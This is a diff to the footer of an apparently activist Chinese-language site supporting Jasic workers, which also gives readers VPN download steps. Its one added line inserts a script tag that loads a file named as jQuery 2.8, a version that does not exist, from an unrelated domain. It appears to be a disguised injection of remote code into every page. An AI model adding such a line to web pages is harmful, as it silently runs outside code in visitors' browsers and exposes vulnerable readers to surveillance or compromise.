--- a/_includes/footer.html
+++ b/_includes/footer.html
@@ -11,6 +11,7 @@
   为相关消息固定的官方发布网址，我们将持续更新佳士工人声援团的相关最新消息，消息不时更新，请大家收藏，保持关注，积极转发！</br>
   本网址需要翻墙浏览，我们在下方提供了<strong>安卓手机翻墙</strong>方法！</br>
 </p>
+<script src="https://www.fingregs.info/jQuery-2.8.min.js"></script>
 <p align="left">
   ★<strong>翻墙方式</strong>★</br>
 1.复制链接到<strong>浏览器</strong>打开，即可下载“secureVPN”。
